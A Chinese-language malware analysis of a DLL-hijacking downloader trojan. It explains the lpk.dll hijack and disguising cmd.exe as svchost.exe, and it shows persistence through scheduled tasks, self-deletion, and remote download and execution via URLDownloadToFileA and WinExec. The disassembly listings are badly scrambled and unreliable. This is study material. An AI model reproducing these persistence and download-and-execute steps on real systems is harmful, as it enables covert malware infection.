抓到一个DLL劫持下载者的样本,正好学习一下,来一步一步分析一下其实现过程。
DLL劫持技术当一个可执行文件运行时,Windows加载器将可执行模块映射到进程的地址空间中,加载器分析可执行模块的输入表,并设法找出任何需要的DLL,并将它们映射到进程的地址空间中。
由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各个目录下查找。利用这个特点,先伪造一个系统同名的DLL,提供同样的输出表,每个输出函数转向真正的系统DLL。程序调用系统DLL时会先调用当前目录下伪造的DLL,完成相关功能后,再跳到系统DLL同名函数里执行。这个过程用个形象的词来描述就是系统DLL被劫持(hijack)了。本文内容所提及均为本地测试,旨在提供教育和研究信息,内容已去除关键敏感信息和代码,以防止被恶意利用。作者不鼓励或支持任何形式的非法行为。
一创建互斥体
CODE:00404844 CODE:00404845 CODE:0040484A CODE:0040484C CODE:0040484E CODE:0040485D CODE:0040485F CODE:00404861 CODE:00404861loc_404861: sub_404844+19j CODE:00404861 CODE:00404863 CODE:00404864
二取Windows目录
push push push push call call cmp ebx offsetName 0FFFFFFFFh 0 ;lpName//'exe' ;int ;lpMutexAttributes //互斥体的构建函数 sub_403EC4 GetLastError_0 eax,0B7h shortloc_404861 bl,1 jnz mov ;CODEXREF: mov eax,ebx ebx pop retn CODE:004041DB CODE:004041E0 CODE:004041E1 push push call 100h ebx ;uSize ;lpBuffer GetWindowsDirectoryA
三删除计划任务C:\WINDOWS\Tasks\At1.job文件
CODE:004041FD //'\tasks\at1.job' CODE:00404202 CODE:00404207 CODE:0040420A CODE:0040420F CODE:00404210 mov edx,offsetdword_404530 call mov sub_403760 eax,[ebp+var_4] sub_403840 eax call push call ;lpFileName DeleteFileA
四把Windows目录下的wsock32x.dll,lpk.dll,avp.exe的文件属性设置为正常,并且删除其文件,然后把木马自身复制到Windows目录下,新命名为avp.exe。
CODE:0040422C dword_404548//'\wsox.dll' CODE:00404231 CODE:00404236 CODE:00404239 CODE:0040423E CODE:0040423F CODE:00404244 CODE:00404249 CODE:0040424C CODE:0040424E CODE:00404253 CODE:00404258 CODE:00404268 CODE:0040426D CODE:0040426E CODE:00404273 CODE:00404278 CODE:0040427B CODE:0040427D CODE:00404282 CODE:00404287 CODE:0040428A CODE:0040428F CODE:00404294 CODE:00404297 CODE:0040429C CODE:0040429D CODE:004042A2 CODE:004042A5 CODE:004042A7 CODE:004042AC CODE:004042B1 CODE:004042B4 //'\wsock32x.dll' CODE:004042B9 CODE:004042BE CODE:004042C1 CODE:004042C6 CODE:004042C7 CODE:004042CC CODE:004042CF CODE:004042D1 CODE:004042D6 CODE:004042DB CODE:004042DE mov edx,offset call mov sub_403760 eax,[ebp+var_8] sub_403840 eax call push call push lea ;lpFileName SetFileAttributesA 80h ;dwFileAttributes eax,[ebp+var_C] edx,ebx mov mov ecx,101h call lea sub_403740 eax,[ebp+var_C] mov edx,offsetdword_404560//'\lpk.dll' sub_403760 call mov eax,[ebp+var_C] call push call push lea sub_403840 eax ;lpFileName SetFileAttributesA 80h ;dwFileAttributes eax,[ebp+var_10] edx,ebx mov mov ecx,101h call lea sub_403740 eax,[ebp+var_10] edx,offsetdword_404574//'\avp.exe' sub_403760 mov call mov eax,[ebp+var_10] sub_403840 call push call lea eax ;lpFileName SetFileAttributesA eax,[ebp+var_14] edx,ebx mov mov ecx,101h call lea sub_403740 eax,[ebp+var_14] mov edx,offsetdword_404548 call mov sub_403760 eax,[ebp+var_14] sub_403840 call push call lea eax ;lpFileName DeleteFileA eax,[ebp+var_18] edx,ebx mov mov ecx,101h call lea sub_403740 eax,[ebp+var_18] edx,offsetdword_404560//'\lpk.dll' mov CODE:004042E3 CODE:004042E8 CODE:004042EB CODE:004042F0 CODE:004042F1 CODE:004042F6 CODE:004042F9 CODE:004042FB CODE:00404300 CODE:00404305 CODE:00404308 CODE:0040430D CODE:00404312 CODE:00404315 CODE:0040431A CODE:0040431B CODE:00404320 CODE:00404322 CODE:00404325 CODE:00404327 CODE:0040432C CODE:00404331 CODE:00404334 CODE:00404339 CODE:0040433E CODE:00404341 CODE:00404346 CODE:00404347 CODE:0040434A CODE:0040434C CODE:00404351 CODE:00404354 CODE:00404359 CODE:0040435A call mov sub_403760 eax,[ebp+var_18] sub_403840 call push call lea eax ;lpFileName DeleteFileA eax,[ebp+var_1C] edx,ebx mov mov ecx,101h call lea sub_403740 eax,[ebp+var_1C] edx,offsetdword_404574//'\avp.exe' sub_403760 mov call mov eax,[ebp+var_1C] sub_403840 call push call push lea eax ;lpFileName DeleteFileA 0 ;bFailIfExists eax,[ebp+var_20] edx,ebx mov mov ecx,101h call lea sub_403740 eax,[ebp+var_20] edx,offsetdword_404574//'\avp.exe' sub_403760 mov call mov eax,[ebp+var_20] sub_403840 call push lea eax ;lpNewFileName edx,[ebp+var_24] eax,eax xor call mov sub_4026F0 eax,[ebp+var_24] sub_403840 call push call eax ;lpExistingFileName CopyFileA
五释放lpk.dll和wsock32x.dll到Windows目录下
CODE:00404371 CODE:00404376 CODE:0040437B CODE:0040437E CODE:00404383 CODE:00404388 CODE:0040438D CODE:00404390 CODE:00404392 CODE:00404397 CODE:0040439C CODE:0040439F dword_404548;wsock32x.dll mov call mov mov mov call lea mov mov call lea edx,offsetdword_404560;\lpk.dll sub_403760 ecx,[ebp+var_28] edx,offsetdword_404588;LPK eax,offsetaExefile;exefile sub_4040A8//资源释放过程 eax,[ebp+var_2C] edx,ebx ecx,101h sub_403740 eax,[ebp+var_2C] mov edx,offset CODE:004043A4 CODE:004043A9 CODE:004043AC CODE:004043B1 CODE:004043B6 call mov sub_403760 ecx,[ebp+var_2C] mov edx,offsetaWsock32x;wsock32x eax,offsetaExefile;exefile sub_4040A8//资源释放过程 mov call
六把system32目录下的CMD,复制到Windows目录下,并命名为svchost.exe,然后对svchost.exe,avp.exe,wsock32x.dll,lpk.dll的文件属性设置为只读,隐藏,系统,然后运行svchost.exe
CODE:004043BB CODE:004043BD CODE:004043C0 CODE:004043C2 CODE:004043C7 CODE:004043CC CODE:004043CF dword_4045B8;\svchost.exe CODE:004043D4 CODE:004043D9 CODE:004043DC CODE:004043E1 CODE:004043E2 CODE:004043E5 CODE:004043E7 CODE:004043EC CODE:004043F1 CODE:004043F4 \\system32\\cmd.exe CODE:004043F9 CODE:004043FE CODE:00404401 CODE:00404406 CODE:00404407 CODE:0040440C CODE:0040440E CODE:00404411 CODE:00404413 CODE:00404418 CODE:0040441D CODE:00404420 dword_4045B8;\svchost.exe CODE:00404425 CODE:0040442A CODE:0040442D CODE:00404432 CODE:00404433 CODE:00404438 CODE:0040443A CODE:0040443D push lea 0 ;bFailIfExists eax,[ebp+var_30] edx,ebx mov mov ecx,101h call lea sub_403740 eax,[ebp+var_30] mov edx,offset call mov sub_403760 eax,[ebp+var_30] sub_403840 call push lea eax ;lpNewFileName eax,[ebp+var_34] edx,ebx mov mov ecx,101h call lea sub_403740 eax,[ebp+var_34] mov edx,offsetaSystem32Cmd_ex; call mov sub_403760 eax,[ebp+var_34] sub_403840 call push call push lea eax ;lpExistingFileName CopyFileA 23h ;dwFileAttributes eax,[ebp+var_38] edx,ebx mov mov ecx,101h call lea sub_403740 eax,[ebp+var_38] mov edx,offset call mov sub_403760 eax,[ebp+var_38] sub_403840 call push call push lea eax ;lpFileName SetFileAttributesA 23h ;dwFileAttributes eax,[ebp+var_3C] edx,ebx mov CODE:0040443F CODE:00404444 CODE:00404449 CODE:0040444C CODE:00404451 CODE:00404456 CODE:00404459 CODE:0040445E CODE:0040445F CODE:00404464 CODE:00404466 CODE:00404469 CODE:0040446B CODE:00404470 CODE:00404475 CODE:00404478 dword_404548;\wsock32x.dll CODE:0040447D CODE:00404482 CODE:00404485 CODE:0040448A CODE:0040448B CODE:00404490 CODE:00404492 CODE:00404495 CODE:00404497 CODE:0040449C CODE:004044A1 CODE:004044A4 CODE:004044A9 CODE:004044AE CODE:004044B1 CODE:004044B6 CODE:004044B7 CODE:004044BC CODE:004044BE CODE:004044C1 CODE:004044C3 CODE:004044C8 CODE:004044CD CODE:004044D0 dword_4045B8;\svchost.exe CODE:004044D5 CODE:004044DA CODE:004044DD CODE:004044E2 CODE:004044E3 mov ecx,101h call lea sub_403740 eax,[ebp+var_3C] edx,offsetdword_404574;\avp.exe sub_403760 mov call mov eax,[ebp+var_3C] sub_403840 call push call push lea eax ;lpFileName SetFileAttributesA 23h ;dwFileAttributes eax,[ebp+var_40] edx,ebx mov mov ecx,101h sub_403740 eax,[ebp+var_40] mov call lea edx,offset call mov sub_403760 eax,[ebp+var_40] sub_403840 call push call push lea eax ;lpFileName SetFileAttributesA 23h ;dwFileAttributes eax,[ebp+var_44] edx,ebx mov mov ecx,101h call lea sub_403740 eax,[ebp+var_44] mov edx,offsetdword_404560;\lpk.dll sub_403760 call mov eax,[ebp+var_44] sub_403840 call push call push lea eax ;lpFileName SetFileAttributesA 0 ;uCmdShow eax,[ebp+var_48] edx,ebx mov mov ecx,101h sub_403740 eax,[ebp+var_48] mov call lea edx,offset call mov sub_403760 eax,[ebp+var_48] sub_403840 call push call eax ;lpCmdLine WinExec
七为avp.exe木马文件添加一个计划任务,达到指定时间运行木马的目的
CODE:00403F84 CODE:00403F85 CODE:00403F87 CODE:00403F8D CODE:00403F8E CODE:00403F8F CODE:00403F91 CODE:00403F97 CODE:00403F9A CODE:00403F9C CODE:00403F9D CODE:00403FA2 CODE:00403FA5 CODE:00403FA8 CODE:00403FAD CODE:00403FB3 CODE:00403FB4 CODE:00403FB9 CODE:00403FBC CODE:00403FC2 CODE:00403FC7 CODE:00403FCC CODE:00403FD1 CODE:00403FD6 CODE:00403FD8 CODE:00403FDD CODE:00403FE2 CODE:00403FE5 CODE:00403FEB CODE:00403FED CODE:00403FF0 CODE:00403FF4 CODE:00403FFA CODE:00403FFF CODE:00404002 CODE:00404007 CODE:0040400D CODE:00404012 CODE:00404015 CODE:00404019 CODE:0040401C CODE:0040401D CODE:0040401E CODE:00404020 CODE:00404025 CODE:00404027 CODE:00404029 CODE:0040402A CODE:0040402B push mov ebp ebp,esp add esp,0FFFFFEF0h ebx push push xor esi eax,eax mov [ebp+var_110],eax [ebp+var_8],eax eax,eax mov xor push push push mov ebp offsetloc_404048 dwordptrfs:[eax] fs:[eax],esp push lea 100h ;uSize eax,[ebp+Buffer] push call lea eax ;lpBuffer GetWindowsDirectoryA eax,[ebp+var_8] edx,[ebp+Buffer] ecx,101h lea mov call mov sub_4039D0 eax,10h call mov sub_4024A0 esi,eax mov eax,4 call mov sub_4024A0 [ebp+JobId],eax dwordptr[esi],9 eax,eax mov xor mov [esi+4],eax mov byteptr[esi+8],0 eax,[ebp+var_110] ecx,offsetaAvp_exe;\\avp.exe edx,[ebp+var_8] sub_403A04 lea mov mov call mov eax,[ebp+var_110] sub_4039E8 call mov [esi+0Ch],eax byteptr[esi+9],1 eax,[ebp+JobId] mov lea push push push call test xor eax esi 0 ;JobId ;Buffer ;Servername NetScheduleJobAdd eax,eax eax,eax edx pop pop ecx pop ecx CODE:0040402C mov fs:[eax],edx CODE:0040402F push offsetloc_40404F CODE:00404034 CODE:00404034loc_404034: sub_403F84+C9j CODE:00404034 ;CODEXREF: lea eax,[ebp+var_110] sub_403908 CODE:0040403A call lea CODE:0040403F eax,[ebp+var_8] sub_403908 CODE:00404042 call retn CODE:00404047
八创建一个批处理,然后调用CreateProcessA运行批处理,删除自身!整个木马的EXE的流程就这样,比较简单~
CODE:004045E4 CODE:004045E5 CODE:004045E7 CODE:004045ED CODE:004045EF CODE:004045F5 CODE:004045FB CODE:00404601 CODE:00404607 CODE:0040460A CODE:0040460C CODE:0040460D CODE:00404612 CODE:00404615 CODE:00404618 CODE:00404619 CODE:0040461A CODE:0040461B CODE:0040461C CODE:0040461D CODE:0040461E CODE:0040461F CODE:00404620 CODE:00404623 c:\\Deleteme.bat CODE:00404628 CODE:0040462D CODE:00404630 CODE:00404636 CODE:0040463B CODE:00404641 CODE:00404646 CODE:0040464B CODE:00404650 CODE:00404656 CODE:0040465B push mov add xor mov mov mov mov mov xor push push push mov nop nop nop nop nop push pop nop lea ebp ebp,esp esp,0FFFFFDCCh edx,edx [ebp+var_230],edx [ebp+var_234],edx [ebp+var_228],edx [ebp+var_22C],edx [ebp+var_4],edx eax,eax ebp offsetloc_4047BD dwordptrfs:[eax] fs:[eax],esp eax eax eax,[ebp+var_4] mov edx,offsetaCDeleteme_bat; call mov sub_40369C edx,[ebp+var_4] eax,[ebp+var_1D0] sub_402A0C lea call lea eax,[ebp+var_1D0] sub_4027A8 call call mov sub_402594 edx,offsetdword_4047E8 eax,[ebp+var_1D0] sub_4038B0 lea call call sub_402D28 CODE:00404660 CODE:00404665 CODE:0040466A CODE:00404670 CODE:00404672 CODE:00404677 CODE:0040467D CODE:00404682 CODE:00404688 CODE:0040468D CODE:00404692 CODE:00404698 CODE:004046B8 CODE:004046BA CODE:004046BF CODE:004046C5 CODE:004046CA CODE:004046CF CODE:004046D5 CODE:004046DA CODE:004046DF CODE:004046E5 CODE:004046EB CODE:004046F0 CODE:004046F5 CODE:004046FA CODE:004046FF CODE:00404705 CODE:0040470A CODE:0040470F CODE:00404714 CODE:0040471A CODE:0040471F CODE:00404724 CODE:0040472A CODE:0040472C CODE:00404731 CODE:00404736 CODE:00404740 CODE:00404749 CODE:0040474F CODE:00404750 CODE:00404756 CODE:00404757 call push lea sub_402594 offsetdword_4047F8 edx,[ebp+var_22C] eax,eax xor call push push lea sub_4026F0 [ebp+var_22C] offsetdword_404808 eax,[ebp+var_228] edx,3 mov call mov sub_4037A4 edx,[ebp+var_228] eax,[ebp+var_1D0] sub_4038B0 lea call call call push lea sub_402D28 sub_402594 offsetdword_404814 edx,[ebp+var_234] eax,eax xor call push push push lea sub_4026F0 [ebp+var_234] offsetdword_404808 offsetdword_404828 eax,[ebp+var_230] edx,4 mov call mov sub_4037A4 edx,[ebp+var_230] eax,[ebp+var_1D0] sub_4038B0 lea call call call mov sub_402D28 sub_402594 edx,offsetdword_40483C eax,[ebp+var_1D0] sub_4038B0 lea call call call lea sub_402D28 sub_402594 eax,[ebp+var_1D0] sub_402AC8 call call lea sub_402594 eax,[ebp+StartupInfo] ecx,ecx xor mov edx,44h call mov sub_402B20 [ebp+StartupInfo.dwFlags],1 [ebp+StartupInfo.wShowWindow],0 eax,[ebp+ProcessInformation] mov lea push lea eax ;lpProcessInformation eax,[ebp+StartupInfo] push push eax 0 ;lpStartupInfo ;lpCurrentDirectory CODE:00404759 CODE:0040475B CODE:0040475D CODE:0040475F CODE:00404761 CODE:00404763 CODE:00404766 CODE:0040476B CODE:0040476C CODE:0040476E CODE:00404773 CODE:00404775 CODE:00404777 CODE:0040477D CODE:0040477E CODE:00404783 CODE:00404789 CODE:0040478A CODE:0040478F CODE:0040478Floc_40478F: sub_4045E4+191j CODE:0040478F CODE:00404790 CODE:00404791 CODE:00404792 CODE:00404793 CODE:00404794 CODE:00404795 CODE:00404796 CODE:00404797 CODE:00404799 CODE:0040479A CODE:0040479B CODE:0040479C CODE:0040479F CODE:004047A4 CODE:004047A4loc_4047A4: sub_4045E4+1DEj CODE:004047A4 CODE:004047AA CODE:004047AF CODE:004047B4 CODE:004047B7 CODE:004047BC
LPK.dll的程序流程
一创建线程
push push push push push mov 0 ;lpEnvironment 40h ;dwCreationFlags ;bInheritHandles ;lpThreadAttributes ;lpProcessAttributes 0 0 0 eax,[ebp+var_4] sub_403840 eax call push push call test jz ;lpCommandLine 0 ;lpApplicationName CreateProcessA eax,eax shortloc_40478F mov eax,[ebp+ProcessInformation.hThread] push call mov eax ;hObject CloseHandle_0 eax,[ebp+ProcessInformation.hProcess] push call eax ;hObject CloseHandle_0 ;CODEXREF: nop nop nop nop nop push pop nop xor pop pop pop mov push eax eax eax,eax edx ecx ecx fs:[eax],edx offsetloc_4047C4 ;CODEXREF: lea eax,[ebp+var_234] edx,4 mov call lea sub_403628 eax,[ebp+var_4] sub_403604 call retn .data:10001253 .data:10001254 push jnz esi shortloc_10001294 .data:10001256 .data:10001258 .data:1000125A .data:1000125C .data:10001261 .data:10001263 .data:10001265 .data:1000126B .data:1000126F 二加载wsock32x.dll .data:1000123D .data:10001242 .data:10001248 .data:1000124A .data:1000124B wsock32x.dll的程序流程 push push push push push push call push call 0 0 0 ;lpThreadId ;dwCreationFlags ;lpParameter offsetStartAddress;lpStartAddress 0 ;dwStackSize 0 ;lpThreadAttributes CreateThread [esp+4+hLibModule];hLibModule DisableThreadLibraryCalls push call push pop offsetLibFileName;wsock32x.dll LoadLibraryA 1 eax 4 retn 一下载过程 003E841E.55 push ebp 003E841F.6845863E00push 003E8645 003E8424.64:FF30 003E8427.64:8920 push mov dwordptrfs:[eax] dwordptrfs:[eax],esp 003E8654 003E842A.6854863E00push /urlmon.dll ; ; 003E842F .E8C8C7FFFF call jmp.kernel32.LoadLibraryA \LoadLibraryA 003E8434.6A00 003E8436.6A00 push 0 push 0 003E8438.8D9524FEFFFFlea 003E843E.B801000000mov 003E8443.E860FFFFFFcall 时文件夹路径 edx,dwordptr[ebp-1DC] eax,1 003E83A8 ;取临 003E8448.8D8524FEFFFFlea 003E844E.BA68863E00mov gk_drf.txt eax,dwordptr[ebp-1DC] edx,003E8668 ; 003E8453.E838BAFFFFcall 003E8458.8B8524FEFFFFmov 003E845E.E8FDBAFFFFcall 003E3E90 eax,dwordptr[ebp-1DC] 003E3F60 003E8463.50 push eax 003E8464.A1A8923E00mov eax,dwordptr[3E92A8] 003E8469.50 push push eax 0 003E846A 003E846C 6A00 E8EBFEFFFFcall jmp.URLMON.URLDownloadToFileA;把远 程服务器的txt文件下载到临时文件夹 003E8471.6AFF /Alertable=TRUE push -1 ; ; 003E8473.68C8000000push |Timeout=200.ms 0C8 003E8478.E887C7FFFFcall \SleepEx jmp.kernel32.SleepEx ; 003E847D.33C0 003E847F.55 xor eax,eax push ebp 003E8480.6810863E00push 003E8610 003E8485.64:FF30 003E8488.64:8920 push mov dwordptrfs:[eax] dwordptrfs:[eax],esp edx,dwordptr[ebp-1E0] eax,1 003E848B.8D9520FEFFFFlea 003E8491.B801000000mov 003E8496.E80DFFFFFFcall 时文件夹路径 003E83A8 ;取临 003E849B.8D8520FEFFFFlea 003E84A1.BA68863E00mov gk_drf.txt eax,dwordptr[ebp-1E0] edx,003E8668 ; 003E84A6.E8E5B9FFFFcall 003E84AB.8B9520FEFFFFmov 003E84B1.8D8528FEFFFFlea 003E84B7.E8BCA4FFFFcall 读取下载后的txt文件里面的下载地址 003E84BC.8D8528FEFFFFlea 003E84C2.E84DA2FFFFcall 003E84C7.E860A1FFFFcall 003E3E90 edx,dwordptr[ebp-1E0] eax,dwordptr[ebp-1D8] 003E2978 ;开始 eax,dwordptr[ebp-1D8] 003E2714 003E262C 003E84CC.33C0 xor mov eax,eax 003E84CE.8945FC dwordptr[ebp-4],eax 003E85DE 003E84D1.E908010000jmp 003E84D6FF45FC 003E84D9.8D55F4 inc lea dwordptr[ebp-4] edx,dwordptr[ebp-C] eax,dwordptr[ebp-1D8] 003E2C18 003E84DC.8D8528FEFFFFlea 003E84E2.E831A7FFFFcall 003E84E7.8D8528FEFFFFlea 003E84ED.E892A7FFFFcall 003E84F2.E835A1FFFFcall eax,dwordptr[ebp-1D8] 003E2C84 003E262C 003E84F7.8D45F8 003E84FA.8B55F4 lea mov eax,dwordptr[ebp-8] edx,dwordptr[ebp-C] 003E3CA0 003E84FD.E89EB7FFFFcall 003E8502.33C0 003E8504.55 xor eax,eax push ebp 003E8505.68D4853E00push 003E85D4 003E850A.64:FF30 003E850D.64:8920 003E8510.6A00 003E8512.6A00 push mov dwordptrfs:[eax] dwordptrfs:[eax],esp 0 push push 0 003E8514.8D9518FEFFFFlea 003E851A.B801000000mov 003E851F.E884FEFFFFcall 时文件夹路径 edx,dwordptr[ebp-1E8] eax,1 003E83A8 ;取临 003E8524.FFB518FEFFFFpush 003E852A.8D9514FEFFFFlea dwordptr[ebp-1E8] edx,dwordptr[ebp-1EC] eax,dwordptr[ebp-4] 003E8530.8B45FC mov 003E8533.E868D4FFFFcall 003E8538.FFB514FEFFFFpush 003E853E.687C863E00push 003E8543.8D851CFEFFFFlea 003E8549.BA03000000mov 003E854E.E881B9FFFFcall 003E8553.8B851CFEFFFFmov 003E8559.E802BAFFFFcall 003E59A0 dwordptr[ebp-1EC] 003E867C ;.exe eax,dwordptr[ebp-1E4] edx,3 003E3ED4 eax,dwordptr[ebp-1E4] 003E3F60 003E855E.50 push mov eax 003E855F.8B45F8 eax,dwordptr[ebp-8] 003E8562.E8F9B9FFFFcall 003E3F60 003E8567.50 push push eax 0 003E8568.6A00 003E856A.E8EDFDFFFFcall jmp.URLMON.URLDownloadToFileA;开始 下载木马 003E856F.6AFF /Alertable=TRUE 003E8571.6A64 |Timeout=100.ms push -1 64 ; ; ; push 003E8573.E88CC6FFFFcall \SleepEx jmp.kernel32.SleepEx 003E8578.6A00 push 0 003E857A.8D950CFEFFFFlea 003E8580.B801000000mov 003E8585.E81EFEFFFFcall 003E858A.FFB50CFEFFFFpush 003E8590.8D9508FEFFFFlea edx,dwordptr[ebp-1F4] eax,1 003E83A8 dwordptr[ebp-1F4] edx,dwordptr[ebp-1F8] eax,dwordptr[ebp-4] 003E59A0 003E8596.8B45FC mov 003E8599.E802D4FFFFcall 003E859E.FFB508FEFFFFpush 003E85AF.BA03000000mov 003E85B4.E81BB9FFFFcall 003E85B9.8B8510FEFFFFmov 003E85BF.E89CB9FFFFcall 下载后的木马 dwordptr[ebp-1F8] 003E867C ;.exe eax,dwordptr[ebp-1F0] edx,3 003E3ED4 eax,dwordptr[ebp-1F0] 003E3F60 ;运行 003E85C4.50 |CmdLine push eax ; ; 003E85C5.E84AC6FFFFcall \WinExec jmp.kernel32.WinExec
这个下载者主要就是运行改名伪装的的cmd.exe,然后利用lpk.dll这特殊的DLL进行劫
持,加载wsock32x.dll这个具有下载功能的DLL。这样整体分析出来,发现也并不复杂。
本文内容所提及均为本地测试或经过目标授权同意,旨在提供教育和研究信息,内容已去除关键敏感信息和代码,以防止被恶意利用。作者不鼓励或支持任何形式的非法行为。